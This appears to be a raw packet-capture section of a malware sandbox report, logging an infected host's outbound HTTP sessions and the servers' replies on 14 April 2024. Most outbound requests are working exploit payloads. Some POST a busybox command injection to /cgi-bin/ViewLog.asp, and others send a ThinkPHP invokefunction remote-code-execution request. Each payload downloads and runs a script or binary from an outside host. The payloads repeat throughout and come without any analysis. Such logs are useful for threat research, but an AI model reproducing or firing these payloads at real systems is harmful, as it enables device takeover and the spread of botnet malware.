                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:24Auth Result: .
                                                        Apr 14, 2024 16:37:26.915046930 CEST167INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:24Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        994192.168.2.234375894.122.70.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.880043983 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        995192.168.2.236012295.100.14.13880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.907675028 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:27.291862011 CEST577INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 355
                                                        Expires: Sun, 14 Apr 2024 14:37:27 GMT
                                                        Date: Sun, 14 Apr 2024 14:37:27 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 37 26 23 34 36 3b 39 36 34 37 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 34 34 37 26 23 34 36 3b 39 36 34 37 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;55722c31&#46;1713105447&#46;9647a<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;55722c31&#46;1713105447&#46;9647a</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        996192.168.2.235806695.57.68.13480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:26.926939964 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:27.341891050 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:37:27.341931105 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        997192.168.2.2355230156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:27.264983892 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 35 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:25Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        998192.168.2.235498431.25.14.248080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:27.371939898 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        999192.168.2.235207262.141.44.548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:27.518456936 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:27.817962885 CEST1175INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 1012
                                                        Date: Sun, 14 Apr 2024 14:37:27 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 32 36 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/7.0.26 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.26</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1000192.168.2.233820494.187.241.1098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:27.775672913 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:28.199525118 CEST21INHTTP/1.1
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1001192.168.2.2355242156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:27.889622927 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:26Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1002192.168.2.234981285.115.166.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.508368015 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:28.839816093 CEST337INHTTP/1.1 405 Not Allowed
                                                        Server: Web server
                                                        Date: Sun, 14 Apr 2024 14:37:24 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 155
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1003192.168.2.235803494.122.223.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.513356924 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1004192.168.2.235803894.121.27.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.517060041 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1005192.168.2.235871494.123.101.388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.517575026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1006192.168.2.234427031.200.66.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.520467997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1007192.168.2.235652631.200.27.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.521841049 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1008192.168.2.2355258156.241.95.7323
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.530774117 CEST179INHTTP/1.0 200 OK
                                                        Server: Proxy
                                                        Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 34 2d 31 34 20 32 32 3a 33 37 3a 32 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                        Data Ascii: Unauthorized ...IP Address: 81.181.54.60MAC Address: Server Time: 2024-04-14 22:37:26Auth Result: .


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1009192.168.2.2359386112.196.77.14580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:28.759237051 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:29.183662891 CEST124INHTTP/1.0 400 Bad Request
                                                        Server: JAL50_MSC_5
                                                        Date: sun, 14 apr 2024 20:07:26 GMT
                                                        Content-Length: 0
                                                        Connection: Close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1010192.168.2.2335164112.173.62.6580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:29.052527905 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1011192.168.2.2341610112.221.48.23480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:29.066293001 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:29.372805119 CEST491INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:37:51 GMT
